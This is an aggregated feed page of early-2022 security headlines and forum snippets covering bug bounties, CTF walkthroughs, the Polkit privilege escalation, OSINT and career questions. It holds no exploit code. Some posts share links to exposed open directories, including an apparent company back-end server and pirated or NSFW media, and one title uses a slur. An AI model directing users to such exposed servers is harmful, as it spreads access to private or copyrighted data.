    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
  • Open

    TheHuzz: Instruction Fuzzing of Processors Using Golden-Reference Models
    Article URL: https://arxiv.org/abs/2201.09941 Comments URL: https://news.ycombinator.com/item?id=30156948 Points: 1 # Comments: 0  ( 2 min )

  • Open

    Analyzing Malware with Hooks, Stomps and Return-addresses
    submitted by /u/jat0369 [link] [comments]
    Don't trust comments
    submitted by /u/crower [link] [comments]
    RCE and Auth Bypass in Aqua Illumination Hydra Series Aquarium Lights
    submitted by /u/laransec [link] [comments]
    Reverse Engineering 3201: Symbolic Analysis
    submitted by /u/OpenSecurityTraining [link] [comments]
    A story of leaking uninitialized memory from Fastly
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    TrendNET AC2600 RCE from the Internet
    submitted by /u/dinobyt3s [link] [comments]
  • Open

    Lots of movies, TV shows, and top shelf porn
    192.64.86.228 submitted by /u/inoculatemedia [link] [comments]
    Movies, Documentaries, music, TV Series etc
    Quite a handful of TV Shows, Movies, Documentaries etc. Some content may be NSFW. http://188.165.227.112/portail/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
  • Open

    Cyber Investigator OSINT CTF “Crime Scene Investigation” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT, forensics, and investigation challenges. Continue reading on Medium »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 02
    After having so much fun solving Hacktoria’s Geolocation — 01 challenge yesterday, I have decided today to go for the 2nd challenge. Here… Continue reading on Medium »  ( 5 min )
    Quiztime — Random OSINT Challenge 7
    On Jan 12, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out where and… Continue reading on Medium »  ( 1 min )
    What is OSINT?(Part 1): A practical introduction!
    This article was written in collaboration with the marvelous Aardwarewolf Continue reading on Medium »  ( 17 min )
    What is OSINT? (Part 1)
    A practical introduction Continue reading on Medium »  ( 16 min )
    Investigating Russian Number Plates
    Russian number plates come in a variety of shapes and sizes and can reveal interesting information regarding the owner of a target vehicle… Continue reading on Medium »  ( 3 min )
  • Open

    Multiple firewall layers - are they necessary?
    I was sitting around today pulling my hair out at the prospect of automating rulebases, objects, etc across the separate vendors we use for our edge and internal firewall. Then the question hit me - why do we even have an internal firewall? Our edge FW is a Palo capable of everything the internal FW does and then some. So why can't I simply take everything hanging off the internal FW, move it to the edge FW, and save some money while making my life much easier? The only things I can come up with that we lose are vendor diversity and physical separation. Am I crazy or missing something? If not - would I even gain anything out of VIRTUALLY splitting those firewalls via different vsys on the Palos (I imagine not)? Thanks! submitted by /u/difflx2112 [link] [comments]  ( 4 min )
    Modbus Traversal?
    My company has an air\gas utility monitor that's connected over cellular back to the utility provider for monitoring and reporting. Currently isolated from anything else. Our Facilities team want to put a modbus TCP device on it for our own internal monitoring and reporting. Anyone have experience with this sort of setup? If someone were to gain access to the utility monitor over cellular could they then utilize modbus to control and traverse our network through the modbus\TCP gateway? submitted by /u/ThePaulHarrell [link] [comments]  ( 2 min )
    Any special tips for a soon to be CISO?
    Hello, I'm about to become the CISO for a school. I'm pretty confident on what I should do and what should be my first steps, but I would like to know if any of you have any uncommon tips? Any good podcast/news source, for example? Thanks! submitted by /u/elminstor [link] [comments]  ( 4 min )
    Computer and phone security
    1) Thank you all for your suggestions on my former question. I'd like to ask about some ways to secure an Android phone and a Windows computer. I am specifically looking for software and/or preferred settings to block intrusions from physical and wireless access in 2 scenarios: 1) Someone gets the phone/computer physically and 2) Someone accesses it wirelessly. I'd like to know what to do so the data are unreadable (preferably encrypted) in scenario 1 while still keeping the phone/computer capable of basic functioning, and so the phone/computer is harder to get into for attackers in (or before) scenario 2. Let's assume both devices are up-to-date with antivirus and firewall (when applicable). I'd like to know the best method even if it means going around some hidden functions of the devices submitted by /u/O-0111 [link] [comments]  ( 1 min )
    Descriptive logic in Mobile Security
    Hi everyone! I'm a cybersecurity student and want to ask a slightly "stupid" question. In my program, there is a subject "Mobile security" where I was given the task to read a descriptive logic book of 500+ pages. So I wanted to ask, what does descriptive logic have to do with Mobile Security? Do you need to know and study this science to ensure the security of an application? submitted by /u/_hanabi_n [link] [comments]  ( 1 min )
    [MFA] Could a managed laptop count as a possession factor?
    Hi, I am supposed to secure a remote connection of company laptops with two factors. The devices are managed by Intune with conditional access. You need a company managed device to connect to the company network. Do you think that per definition the managed device with conditional access could count as a possession factor in a multi-factor authentication? Wikipedia says about the possession factor Possession factors ("something only the user has") have been used for authentication for centuries, in the form of a key to a lock. The basic principle is that the key embodies a secret that is shared between the lock and the key, and the same principle underlies possession factor authentication in computer systems. A security token is an example of a possession factor. One could argue that the device itself could count as a possession. It's not personalized but you still require one device out of a few hundred and one set of credentials to establish a connection. submitted by /u/Vertripper [link] [comments]  ( 4 min )
    Discovered IDOR vuln that reveals vaccination records
    Hello NetSec, Upon receiving my vaccination record, I discovered that I was able to retrieve other vaccination records along with other patient data by simply incrementing URL values. Worst part is that you can retrieve these records without being authenticated. The application initially authenticates patients to retrieve the records, but I found out you can reach the URL without being authenticated. Looking for suggestions to responsibly disclose this issue to the laboratory. I'm sure this is a violation of HIPAA. submitted by /u/nocmd [link] [comments]  ( 2 min )
    Career advice request
    I’m currently a web application developer going on 10 years now. I also have 7 years in systems and network administration. I’ve always wanted to get into cybersecurity, but with so many roles out there, most asking for several years in security, I’m not sure what I’m actually qualified for. Over the years my networking knowledge and muscle memory have depleted, and perhaps feeling a bit imposter syndromey. The last server OS I supported was Windows Server 2003 so you could say I’m not up to speed on latest tech in the greater IT sphere. Also, I’m in my early 40s if that matters at all. Just looking for some general advice as to what, if anything, I should target my job search around. I’m definitely up to refresh/update my current skills with courses or whatever providing it makes sense to even pursue at this stage in my career. Thanks in advance. submitted by /u/zushazero [link] [comments]  ( 1 min )
  • Open

    How I approached Dependency Confusion!
    Hi People, In this blog, I will be sharing my approach for finding Dependency Confusion bugs. Continue reading on Medium »  ( 1 min )
    XSS Discovery and Exploitation With BurpSuite
    I’ve recently completed TryHackMe’s cross-site-scripting room and PortSwigger’s XSS labs and here’s what I’ve learned! This piece assumes… Continue reading on Medium »  ( 4 min )
    rDEX Bug Bounty
    Overview Continue reading on Medium »  ( 3 min )
    Vulnerability Capstone — Tryhackme
    Vulnerability Researching Continue reading on Medium »  ( 1 min )
    How I was able to buy a product for free — $$$
    Hi everyone, I hope you are good. It’s been a long time since I last wrote. So in this article I will share about my finding.. Continue reading on Medium »  ( 1 min )
    How I Found A Simple Stored XSS
    This is the story of how I found my first Stored XSS (“Cross Site Scripting”) vulnerability in a bug bounty program and a walk through on… Continue reading on Medium »  ( 3 min )
  • Open

    SecWiki News 2022-01-31 Review
    SecWiki Weekly (Issue 413) by ourren Challenges and Opportunities in Misconfiguration Injection Testing by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Vulnerability in PostBus public transport platform exposed customer data
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-postbus-public-transport-platform-exposed-customer-data Comments URL: https://news.ycombinator.com/item?id=30147933 Points: 1 # Comments: 0  ( 3 min )
    Inspector-gadget: exploit for a vulnerability in the Linux USB Gadget
    Article URL: https://github.com/szymonh/inspector-gadget Comments URL: https://news.ycombinator.com/item?id=30146403 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Puzzling RDP Cache - Putting the Pieces Together
    Good morning, It’s time for a new 13Cubed episode! Let's take a look at an easier way to reassemble RDP bitmap cache. And, if you're a little rusty on where to find the cache and how to export it, we'll cover that too! Episode: https://www.youtube.com/watch?v=9P845AMjJF0 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    Failed GNFA, looking for tips and any advice for learning in a better way
    Just failed my GNFA and I feel really bad. Can anyone help me out with a mental boost by advising how I could be better in the next go? submitted by /u/xray_icon [link] [comments]  ( 3 min )
  • Open

    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
  • Open

    Model shares income from racy OnlyFans clips to help veterans and reveals her big dream
    The Daily Star reports the story of Cami Strella, a standout star on the adult platform OnlyFans, who has revealed her dream for the future… Continue reading on Medium »

  • Open

    Archive of software for the Tandy Radio Shack - TRS-80 Model III
    http://cpmarchives.classiccmp.org/trs80/Software/Model%20III/ circa 1979 submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    PDFs on Food science
    PDFs on Food safety, handling, manufacturing, storage, processing etc... http://154.68.126.6/library/Food%20Science%20books/ submitted by /u/amritajaatak [link] [comments]
    Some Engineering Company website Back end
    Appears to be the back end FTP server of an engineering company website. No clue if it's any useful or not. Maybe it is? https://elsmar.com/pdf_files/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
    Some ODs don't show up in Reddit search but when trying to post, it says that it has been posted by someone?
    Let's take this NSFW OD for example: https://pmagazine.co/wp-content/uploads/ One result shows up if I search for the domain. I decided to try to post it anyway since the URL he posted doesn't work anymore. When I tried to post there was a message about a duplicate post from a totally different user with the same URL. Why didn't that one show up when searching for "pmagazine"? There should be at least 2 results but only 1 is showing. submitted by /u/Boobalizer [link] [comments]  ( 1 min )
    Tranny hardcore videos (NSFW. Not my thing but who am I to judge)
    submitted by /u/Boobalizer [link] [comments]
  • Open

    Building Custom Empire Modules
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    How do you get open-source releases of vulnerabilities and other cyber threat news?
    It seems like Twitter is the answer, but I'm curious if I'm missing some sort of centralized hub for this kind of information that is free of unimportant information. What do you personally use? submitted by /u/Hymnosi [link] [comments]  ( 1 min )
    Can you "DDOS" someone through their public IP without being connected to each other in any way?
    A friend came up to me and told me that someone was "DDOSing" him. He said he got his computer IP from a video game server and he "DDOsed" him. How could he tell? He said he noticed packet loss and he had a higher ping and it disconnected him from Discord or something, they were in a call the whole time when it happened. My friend changed his PC public IP with some Windows settings after that. Now my friend believes that this guy is some big brain hacker and I can't convince him he is not, I don't want him to believe that this guy is in control of his security. Would also love to know what exactly happened and what this script kiddie could've. submitted by /u/AnnoyingN-wah [link] [comments]  ( 2 min )
    What's the best way to secure 1) An Android phone 2) A Windows PC and 3) Home and company network?
    Hello! I'd like to know 1) How to secure an Android phone (even if it means gaining root access) while keeping basic usability 2) How to secure a Windows computer against outside attacks (also while keeping basic functionality) 3) How to secure a home and company network against attacks and data leaks submitted by /u/O-0111 [link] [comments]  ( 2 min )
    [Serious] How Fast would Quantum Computers Crack Passwords/Tokens/Logins?
    From this video I watched from my Youtube feed, I'm aware that quantum computers would be extremely fast in computing speed, but how fast would they be able to crack things that are say: Passwords 20, 50, 100 random-characters long with just ASCII input Passwords 20, 50, 100 random-characters long that utilize ASCII, Unicode, and non-standard characters The two same concepts above, but with random words like "water", "trampoline", etc. dropped randomly into the passphrases so it's just not jumbled, and requires a full dictionary of words to crack. Randomized session-login tokens, like used for Discord, Google, browser cookies in general. Weak, typical username + password combinations used for things like social media where both are shorter than 10 characters generally. Edit: T…  ( 5 min )
  • Open

    Intro to Embedded RE Part 3: UART Discovery and Firmware Extraction via UBoot
    submitted by /u/wrongbaud [link] [comments]  ( 1 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    submitted by /u/Most-Loss5834 [link] [comments]  ( 3 min )
  • Open

    How to find locations to check for Russian military build-up?
    Methods for Investigating where Russian troops accumulated along Ukraine border Continue reading on Medium »  ( 4 min )
    Walkthrough —Hacktoria: Geolocation 01
    I came across the Hacktoria website today whilst looking for OSINT information. If you navigate to “Practice” — “Geolocation” you’ll come… Continue reading on Medium »  ( 3 min )
    Why we must nurture positive ethics in “citizen-driven” OSINT
    As citizen-driven open source intelligence (OSINT) grows in popularity, so does the risk of techniques being used by bad actors. I outline… Continue reading on Medium »
  • Open

    Spare GCFA Practice
    Hey all Anyone here have a spare GCFA practice they could wing this way ? Despite multiple content run throughs and a comprehensive index, I flunked both my practice exams :S Second fail was surprising as I felt confident ! 2 weeks left now until the real thing so hoping some more turbo study and another practice may boost the confidence. Cheers ! submitted by /u/Gumps903 [link] [comments]  ( 1 min )
    Do the SANS Live Classes just reuse the slides from the book or do they have other slides to use during class time?
    Thanks! submitted by /u/curiousgal1996 [link] [comments]  ( 1 min )
    Recover Historical Firewall Logs
    Hi all, This relates to a computer running Windows 10 home. Several months ago a program made a request to make an outbound connection. This request was probably blocked by the default firewall. I would like to note any info about this request, particularly the date and time, but firewall logging was off. Is there somewhere else this would be stored? Thank you, and I'm sorry if this is the wrong forum for this. submitted by /u/KoosOomakey [link] [comments]  ( 1 min )
  • Open

    My Bug Bounty Adventure -2-
    Greetings everyone from the Promentorium bosporium. Continue reading on Medium »  ( 2 min )
    DARPA’s quest for the (almost) unhackable
    Welcome to Changelog by README! I’m your host, Blake Sobczak. Every Sunday, I’ll deliver cybersecurity news and analysis to your inbox… Continue reading on README_ »  ( 4 min )
    How I hacked my way to the top of DARPA’s hardware bug bounty
    Go inside one of the most technically challenging bug bounties ever with the researcher who subverted secure hardware designed by MIT and… Continue reading on README_ »  ( 9 min )
    How i exposed the teacher’s Aadhaar card,bank details in the college website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 1 min )
    All About CSRF Flaw
    Continue reading on InfoSec Write-ups »  ( 2 min )
    Docker: From a beginner's perspective
    Docker is actually a docker engine that is used to create containers. Containers can be considered as VMs, but these VMs don’t have any… Continue reading on Medium »  ( 6 min )
    Price Tampering | Buying T-Shirts at 2 INR
    Hello Weirdos!!! Today I am going to share a write-up on a weird price tampering vulnerability I found a few months ago(currently patched). Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - OS COMMAND INJECTION LAB SOLUTIONS
    OS command injection allows an attacker to run arbitrary operating system (OS) commands on a web application server and the application… Continue reading on Medium »  ( 4 min )
    How to get started hacking django applications
    Django is a python based web framework. In this writeup, i will teach you how to analyze django based applications . For this writeup, i… Continue reading on Medium »  ( 4 min )
  • Open

    Critical full compromise of jarvis-new.urbanclap.com via weak session signing
    Urban Company disclosed a bug submitted by ian: https://hackerone.com/reports/1380121 - Bounty: $1500
    No character limit in password field
    UPchieve disclosed a bug submitted by tomyway: https://hackerone.com/reports/1462175
  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
  • Open

    SecWiki News 2022-01-30 Review
    Threat Scenario Analysis Framework by ourren wJa (D&S&I)AST Tool by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

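    Cyberspace Administration publishes security certification and testing results for critical network equipment and specialized cybersecurity products
    On January 29, the official website of the Office of the Central Cyberspace Affairs Commission published 2022 Announcement No. 1, "Announcement on the Unified Release of Security Certification and Security Testing Results for Critical Network Equipment and Specialized Cybersecurity Products."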

  • Open

    JAVA ON EARTH [KNIGHT-CTF]
    Given Data: Continue reading on Medium »  ( 2 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    xeuldoc: Fetch information about any public Google document
    Introduction Continue reading on Medium »  ( 1 min )
    Basic OSINT Course
    Basic OSINT course — web searching for beginners — syllabus Continue reading on Medium »  ( 1 min )
    Finding the author of an illustration
    A while ago I spotted an image on reddit that really struck with me. I immediately knew I wanted to use it as my profile picture… Continue reading on Medium »  ( 2 min )
    In the beginning there was a tweet
    For the past year and a half I have been very interested in a career change into the cyber security and ethical hacking industry. I have… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 6
    On Jan 13, 2022, Quiztime (contributor @N_Waters89) shared a new OSINT quiz with us. The objective was simple. We had to figure out where and w Continue reading on Medium »  ( 2 min )
  • Open

    Windows vulnerability with new public exploits lets you become admin
    Article URL: https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/ Comments URL: https://news.ycombinator.com/item?id=30130902 Points: 7 # Comments: 0  ( 4 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
    NMAP Vulnerability Scanning Scripts
    Article URL: https://github.com/nccgroup/nmap-nse-vulnerability-scripts Comments URL: https://news.ycombinator.com/item?id=30122224 Points: 2 # Comments: 0  ( 1 min )
  • Open

    GitHub: The Red-Teamer’s Cheat-Sheet
    It’s no secret that GitHub has become one of the main information resources for red-team reconnaissance. I mean, why bother with complex… Continue reading on Medium »  ( 3 min )
    How To Handle Security Due Diligence During The M&A Process
    More often than not, we see our clients show interest in other companies. This pull can come in many different forms, but it’s usually… Continue reading on Medium »  ( 2 min )
  • Open

    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made $15,000+ By Hacking Caching Servers — Part 1
    @bxmbn Continue reading on Medium »  ( 1 min )
    A Summary of OAuth 2.0 Attack Methods
    The attacker grabs the authentication request to construct a malicious URL and deceives the logged-in user of the server to click it. Continue reading on Medium »  ( 2 min )
    TrustRecruit — BUG BOUNTY
    TrustRecruit will be allocating 750,000 TRT of the total supply of $TRT tokens to successful bounty hunters. Continue reading on Medium »  ( 2 min )
    2fa Bypass by changing Request method to DELETE
    Hello Everyone My name is Arth Bajpai, I’m from Lucknow, India, and I’m back with my third write-up about a 2fa Bypass which I Found a… Continue reading on Medium »  ( 3 min )
    My First Bug is P1 in Just 3 Minute
    Hello Hacker’s and Security Guys that is My first article on how to find a P1 bug Continue reading on Medium »  ( 1 min )
  • Open

    Some lingerie photos NSFW (among other more boring stuff)
    submitted by /u/Boobalizer [link] [comments]
    PS3 sound files from games - Nicely sorted (Good speed. ~11 MB/s.)
    submitted by /u/Boobalizer [link] [comments]  ( 1 min )
  • Open

    Misconfiguration in build environment allows DLL preloading attack
    Monero disclosed a bug submitted by nim4: https://hackerone.com/reports/896338
    XSS via X-Forwarded-Host header
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1392935 - Bounty: $200
  • Open

    How did my hosting service change my interface config?
    Hello AskNetsec, I got a VPS on a hosting service with Ubuntu on it and I closed all the ports, changed the default SSH port and changed the root and default user passwords. Then I asked my hosting service to change my public IP address. After that I saw my /etc/network/interfaces config changed... how did they do that? There is not even anything in the history :\ Any info on how they did it is appreciated. Thanks! submitted by /u/g0g0gaga [link] [comments]  ( 1 min )
    How are you guys using IOCs in your SIEM environment?
    Hey everyone! I was curious how everyone is using IOCs in their SIEM environments. We are currently focusing on TTP’s but would love to have the ability to compare our logs against known positive IOCs. We are currently only using them in our EDR solution but not our SIEM. How are you guys using them in the SIEM platform? submitted by /u/RedNeckHutch [link] [comments]  ( 2 min )
    Just finished my first week of training in SOC. Anyone here familiar with MAStermind? Looking for resources to study over the weekend.
    SOC training has been so cool. The access I have is nuts. submitted by /u/ShittyF00dPorn [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-29 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Five Hacking Tips - Pkexec Linux Priv. Escalation
    submitted by /u/sysrisk [link] [comments]
  • Open

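    FreeBuf Morning Briefing | Finnish diplomats' devices infected with Pegasus spyware; US revokes Chinese telecom company's license on national security grounds
    According to foreign media reports, the US Federal Communications Commission (FCC) has revoked the license of China Unicom Americas, citing "serious national security concerns."  ( 1 min )
    Packer? Evasion? "Transparent Tribe" is seeking a new way forward for CrimsonRAT
    The Transparent Tribe group mainly targets the Indian government, military, or related organizations, as well as activists and civil society in Pakistan.  ( 1 min )
    Social Responsibility | Tophant's (斗象科技) "FUN heart" approach in 2021
    Shouldering the mission, fulfilling responsibility
    Writing a RestTemplate-based online arsenal
    Using Springboot RestTemplate to develop automation tools and achieve real team collaboration.  ( 2 min )
    Notes on Industrial Cyber Ranges (Part 8) | An overview of industrial cyber ranges abroad
    This article turns to look abroad, briefly surveying the development of industrial cyber ranges in other countries.  ( 1 min )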

  • Open

    North Korea's Lazarus APT leverages Windows Update client, GitHub in latest campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Detecting and mitigating CVE-2021-4034: “Pwnkit” local privilege escalation
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    How to Analyze RTF Template Injection Attacks
    submitted by /u/ogunal00 [link] [comments]
    Pivoting with SSH Tunnels and Plink
    submitted by /u/m_edmondson [link] [comments]
    Rip Raw - A tool to analyse the memory of compromised Linux systems.
    submitted by /u/0x636f6f6c [link] [comments]
    Stop Storing Secrets In Environment Variables!
    submitted by /u/alxjsn [link] [comments]  ( 3 min )
    ROP Chaining: Return Oriented Programming (study notes, tutorial)
    submitted by /u/Kondencuotaspienas [link] [comments]
    "Stratus Red Team": open-source adversary emulation for AWS
    submitted by /u/thorn42 [link] [comments]
    The Cookies Parasite - Bypassing MFA with cookie theft
    submitted by /u/amirshk [link] [comments]
  • Open

    CTF Walkthrough | TryHackMe | Freshly
    Can you root this Wordpress style, SQL injection vulnerable machine? This CTF is about SQL Injection and Wordpress hacking. Developers… Continue reading on Medium »  ( 4 min )
  • Open

    Fixing the Linux Kernel Vulnerability CVE-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0  ( 6 min )
    RHSB-2022-001 Polkit Privilege Escalation – (CVE-2021-4034)
    Article URL: https://access.redhat.com/security/vulnerabilities/RHSB-2022-001 Comments URL: https://news.ycombinator.com/item?id=30113422 Points: 1 # Comments: 0  ( 10 min )
  • Open

    A bunch of movie scripts
    submitted by /u/theg721 [link] [comments]  ( 1 min )
    words
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    horse food
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Russian and European rocket launch videos - Broadcast quality
    http://tvdownload.esa.int/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Magnetometer datasets from various space missions
    https://pds-ppi.igpp.ucla.edu/data/ The Planetary Plasma Interactions (PPI) Node of the Planetary Data System (PDS) archives and distributes digital data related to the study of the interaction between the solar wind and planetary winds with planetary magnetospheres, ionospheres and surfaces. The PPI Node is located at the Department of Earth, Planetary, and Space Sciences at the University of California, Los Angeles (UCLA). submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-28 Review
    CodeQL: Advanced Topics by ourren; How to Get Started with ICS Vulnerability Hunting by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

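    Summary of Key Points from the DC Series Target Machines
    This article summarizes the tools, commands and privilege-escalation techniques used across the nine target machines of the DC series.  ( 1 min )
    VulnHub DC-9 Target Machine: Detailed Penetration Walkthrough
    A very detailed walkthrough of the DC-9 target.  ( 1 min )
    VulnHub DC-8 Target Machine: Detailed Penetration Walkthrough
    A very detailed walkthrough of the DC-8 target.  ( 1 min )
    VulnHub DC-7 Target Machine: Detailed Penetration Walkthrough
    Very detailed notes on the DC-7 target walkthrough.  ( 1 min )
    FreeBuf Morning Briefing | EU Issues Ultimatum to WhatsApp; North Korea's Critical Services Suspected Hit by DDoS Attack
    The European Commission announced that WhatsApp must, within one month, clarify some recent changes to its terms of service and privacy policy to ensure compliance with EU consumer protection law.  ( 1 min )
    Cyberspace Administration of China Releases "Provisions on the Administration of Deep Synthesis Internet Information Services (Draft for Comment)"
    The draft comprises twenty-five articles. It sets out regulatory requirements for generative and synthetic algorithms and for producing audio and video content with new technologies and applications such as deep learning and virtual reality, further clarifies and details the application scenarios of deep synthesis technology, and specifies the information security obligations of deep synthesis service providers and users.
    10 Useful Free Data Recovery Tools for 2022
    10 Useful Free Data Recovery Tools for 2022  ( 1 min )
    CVE-2021-4034 Linux Polkit Privilege Escalation Vulnerability: How the Bug Was Found
    One article that walks you through the entire discovery process of the CVE-2021-4034 vulnerability.  ( 1 min )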
  • Open

    Paytm-Broken Link Hijacking
    Hello Everyone…. Continue reading on InfoSec Write-ups »  ( 2 min )
    TEJAS PANCHAL ONE OF THE YOUNGEST CYBER SECURITY EXPERT.
    We welcome increasingly more potent online vulnerabilities as we go into a digitized future with advanced information technology shaping… Continue reading on Medium »  ( 1 min )
    OpenLeverage Partners with Code4rena for Audit Contest to Enhance Security Measures
    Since our inception, OpenLeverage has been committed to developing a permissionless lending and margin trading protocol with aggregated… Continue reading on Medium »  ( 2 min )
  • Open

    Are there any dynamic lists that are maintained to track VPNs egress points like nord or surfshark?
    submitted by /u/krattalak [link] [comments]  ( 1 min )
  • Open

    Targeted Healers: Open Source Analysis of Attacks on Hospitals and Medical Staff in Sudan
    Open source evidence shows how Sudan’s security forces attacked hospitals, medical workers and patients during recent protests in Khartoum Continue reading on Medium »  ( 7 min )
    Try Hack Me’s OhSint: A Walkthrough
    Hello readers, welcome to this segment of my blog, as I guide you to solve the OhSint Room, hosted on TryHackMe. This room is a lot of fun! Continue reading on Medium »  ( 2 min )
  • Open

    Anyone done the FLETC forensics courses?
    I'm doing forensics for the military and have an upcoming Digital Evidence Collection in an Enterprise Environment course at FLETC. Since a lot of members of this subreddit are LE, I was wondering if any of you have taken this course and, if so, how was it? submitted by /u/Sandyblanders [link] [comments]  ( 1 min )
  • Open

    Zero trust countdown: New OMB memo stresses urgency for modern AppSec
    A new OMB memo from the White House is underscoring the need for federal agencies to adopt zero trust architecture in AppSec. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    Full read SSRF via Lark Docs `import as docs` feature
    Lark Technologies disclosed a bug submitted by sirleeroyjenkins: https://hackerone.com/reports/1409727 - Bounty: $5000

  • Open

    Certification Question
    I am enrolled in a boot camp for Certified Computer Forensics Examiner/ Certified Mobile Forensics Examiner through InfoSec Institute next week. This was to prepare us for IACRB's certifications CCFE/CMFE. This morning, I noticed that InfoSec pulled the original syllabus, IACRB's website is locked down and have since learned that IACRB is now dissolved. InfoSec says that the certification will be now issued by them instead of IACRB (apparently, IACRB was affiliated with them originally). I know certifications aren't the end-all, be-all (experience is key, I know). But I want to make sure that I am receiving certs from organizations that are trustworthy. I've seen many job postings asking for the CCFE especially. Does this matter at all? Did IACRB's standing show any clout previously and will this now be lost? submitted by /u/FormerFive0 [link] [comments]  ( 2 min )
    Help with a ransomware infected Synology NAS
    Hi all, I recently encountered a Synology NAS with proprietary Synology RAID on both of its 4TB HDDs. I initially intended to acquire both drives and attempt to rebuild the RAID with all possible bit and strip size combinations but realised that it might not be worth it. My objective was to reacquire a readable drive and process the data in AXIOM for timeline, event logs analysis etc. My last resort would be to run the NAS on a simulated network to access the files. But I realise that even then I may not be able to target a network drive to acquire the data. Perhaps only log file analysis by exporting Linux artefacts (bash history, recent files, system logs etc). Would like to seek advice from those who had previously encountered such exhibits and how you managed to retrieve log records. Would running KAPE on a host network PC targeting the network drive or perhaps using a Tsurugi OS machine and linking it to the NAS to run analysis tools be useful here? submitted by /u/Drako880 [link] [comments]  ( 2 min )
    Did Encase support linux/docker forensic
    Which Encase enpack can we get memory of Linux physical machine and docker memory? Which are the Linux forensic artifacts support by Encase besides user login/bash history/process/network info, any Enpack can use? Did Encase provide timeline analysis for linux image/Docker image? submitted by /u/cyberfo [link] [comments]  ( 1 min )
  • Open

    Anyone have a good list of people to follow on twitter for security updates? Preferably ones that have a lot of technical content.
    I know twitter is very good for security news, but a lot of the ones I find are just like news sites that don't tell me much about the technical side of new vulnerabilities, attacks and bugs. I'm interested in pretty much all topics of security. Appsec, mobile sec, threat modelling, anything. If you have lists of people to follow who go into great technical detail, I'd be very grateful! Thanks! submitted by /u/Epsi0 [link] [comments]  ( 1 min )
    what is the best way to cleanse a PC?
    I'm no tech buff, so sorry if I'm asking all the wrong questions. But when I was living with family, my siblings would test out their spyware hacks on my laptop/phones. I remember on the laptop I could tell when they were trying something because it would start acting funny, and on startup or mid-session there would be a couple of cmd boxes that would appear, run something and close out by themselves. Recently I'm seeing the same type of things happening, mainly on my GF's laptop, but we are renting our own apartment so I am a little worried about security. I'm using Avira anti-virus but honestly think these things are a joke. My question is how exactly do you protect against and get rid of attacks like this? I have tried reformatting the drives in the past, but that would only last long enough for whatever I deleted to redownload, then I'll be having the same symptoms all over again. Sorry for the broad description; like I said, I'm not that tech savvy, but thanks for you guys' time and hopefully can point me in the right direction. Much appreciated! submitted by /u/Questionable_Qs_2655 [link] [comments]  ( 2 min )
    How does clicking an email link result in installing malware?
    Can someone explain exactly how clicking on a link in an email can install malware on a device? submitted by /u/LagunaLoireFF8 [link] [comments]  ( 1 min )
    How do you manage auxiliary AD accounts password expiration?
    For example, separated admin accounts in an Active Directory without interactive logons (run-as): you don't get interactive notifications about password expiration for that account... how do you manage this? Script? submitted by /u/arnaudluti [link] [comments]  ( 2 min )
    Why should sensitive documents not be sent via Email?
    Why do people advise against sending sensitive documents via Email? submitted by /u/Linux98 [link] [comments]  ( 2 min )
  • Open

    CVE-2021-4034
